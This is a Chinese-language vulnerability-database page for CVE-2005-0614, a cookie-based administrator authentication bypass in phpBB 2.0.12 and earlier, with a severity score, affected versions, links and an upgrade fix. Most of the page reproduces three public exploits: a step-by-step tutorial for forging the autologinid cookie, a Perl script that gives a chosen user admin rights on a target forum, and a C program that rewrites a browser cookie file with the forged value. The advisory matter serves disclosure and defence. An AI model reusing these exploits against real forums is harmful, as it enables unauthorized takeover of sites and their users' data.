CVE-2005-0614
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:13:03
NMCOE    

[原文]sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.


[CNNVD]phpBB多个漏洞(CNNVD-200505-776)

        phpBB 2.0.12及更早版本中的sessions.php使得远程攻击者可以通过一个在cookie中的autologinid值来获取管理员权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:2.0.12
cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.11
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.10
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:1.4.4
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0.7a
cpe:/a:phpbb_group:phpbb:1.2.1
cpe:/a:phpbb_group:phpbb:1.4.0
cpe:/a:phpbb_group:phpbb:1.4.1
cpe:/a:phpbb_group:phpbb:1.4.2
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:1.0.0
cpe:/a:phpbb_group:phpbb:2.0.9
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:1.2.0
cpe:/a:phpbb_group:phpbb:2.0.7
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0.6d
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0.6c
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:2.0.8a
cpe:/a:phpbb_group:phpbb:2.0_beta1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0614
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0614
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-776
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110970201920206&w=2
(UNKNOWN)  BUGTRAQ  20050301 phpBB <= 2.0.12 UID Exploit
http://marc.info/?l=bugtraq&m=110999268130739&w=2
(UNKNOWN)  BUGTRAQ  20050304 phpBB 2.0.12 Session Handling Administrator Authentication Bypass
http://www.phpbb.com/phpBB/viewtopic.php?t=267563
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=267563

- 漏洞信息

phpBB多个漏洞
高危 未知
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        phpBB 2.0.12及更早版本中的sessions.php使得远程攻击者可以通过一个在cookie中的autologinid值来获取管理员权限。

- 公告与补丁

        暂无数据

- 漏洞信息 (871)

phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2) (EDBID:871)
php webapps
2005-03-11 Verified
0 Ali7
N/A [点击下载]
phpBB 2.0.12 Session Handling Authentication Bypass ..
 
easy to use exploit ..
 
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
 
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
 
3- Close the Browser ..
 
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
 
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
 
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
 
save the cookies.txt..
 
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! :D
 
complete the mission by clicking " Go to Administration Panel "
 
--------------------------------------------------------------------------------
 
written by : Ali7
e-mail : ali7@hotmail.co.uk

# milw0rm.com [2005-03-11]
		

- 漏洞信息 (889)

phpBB <= 2.0.12 Change User Rights Authentication Bypass (EDBID:889)
php webapps
2005-03-21 Verified
0 Kutas
N/A [点击下载]
#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable 
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
 
#   by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
 {
 print q(
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)] 
 i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
 ++++++++++++++++++++++++++++++++++++++++++++++++++++
           );   
 exit;
 } 
use strict;
use LWP::UserAgent;

my $host  = $ARGV[0];
my $path  = $ARGV[1];
my $user  = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path; 
 

use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
	$proxy =~ s/(http:\/\/)//eg;
	$browser->proxy("http" , "http://$proxy");
 }
 print "++++++++++++++++++++++++++++++++++++\n";
 print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser->get($request);
die "Error: ", $response->status_line
 unless $response->is_success;
 
if($response->content =~ m/phpbbprivmsg/) {
  print "\n   Forum is vulnerable!!!\n";
} else {
  print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
  $request,
  [
    'username'  => $user,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
  ],
);
die "Error: ", $response->status_line
 unless $response->is_success;

if ($response->content =~ /name="u" value="([\d]*)"/) 
	{print "   Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
   else {print "No user $user found..."; exit(); }	
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser->post(
  $request,
  [
    'userlevel'  => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> $uid,
    'submit'=> 'Submit'
  ],
);
die "Error: ", $response->status_line
 unless $response->is_success;
print "   Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

# milw0rm.com [2005-03-21]
		

- 漏洞信息 (897)

phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code) (EDBID:897)
php webapps
2005-03-24 Verified
0 str0ke
N/A [点击下载]
/* Paisterist's code was nice but heres mil's version.
 * precompiled: http://www.milw0rm.com/sploits/897.rar
 * Usage: 
 * bcc32 897.cpp
 * and place the exe in your firefox profile dir.
 * Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
 * Visit a site with phpbb, close the browser, double click the exe, browse site.
 * This gives anonymous users administrator rights only.
 * Ya its lame im bored kthnx. If something goes wrong clear cookies.
 * 
 * /str0ke
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;

if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
       {
       printf("malloc issue...\n");
       return new_text;
       }
found = strstr(text, find);
while (i <= len_text)
{
if ( found != text + i )
       {
       new_text[j] = text[i];
       i++;
       j++;
       }
       else
       {
           strcat (new_text, replace);
           i += len_find;
           j += len_replace;
           found = strstr (text + i, find);
       }
       new_text[j] = '\0';
}
return new_text;
}

int main()
{
  FILE * pFile;
  long lSize;
  char * buffer;

  pFile = fopen ( "cookies.txt" , "r" );
  if (pFile==NULL) exit (1);

  fseek (pFile , 0 , SEEK_END);
  lSize = ftell (pFile);
  rewind (pFile);

  buffer = (char*) malloc (lSize);
  if (buffer == NULL) exit (2);
  fread (buffer,1,lSize,pFile);
  fclose (pFile);

  pFile = fopen ( "cookies.txt" , "w" );
  fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
  fclose (pFile);
  free (buffer);
  return 0;

}

// milw0rm.com [2005-03-24]
		

- 漏洞信息

14242
phpBB sessions.php autologinid Remote Privilege Escalation
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

phpBB contains a flaw that may allow a remote attacker to gain access to unauthorized privileges. The issue is triggered due to an error in the comparison of "sessiondata['autologinid']" and "auto_login_key". Further, phpBB does not reset the $userdata['user_level'] variable after a failed autologin. It is possible for a remote attacker to set a specially crafted cookie to change the user_id to that of an administrator resulting in a loss of integrity.

- 时间线

2005-02-27 2001-01-01
2005-02-28 Unknow

- 解决方案

Upgrade to version 2.0.13 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站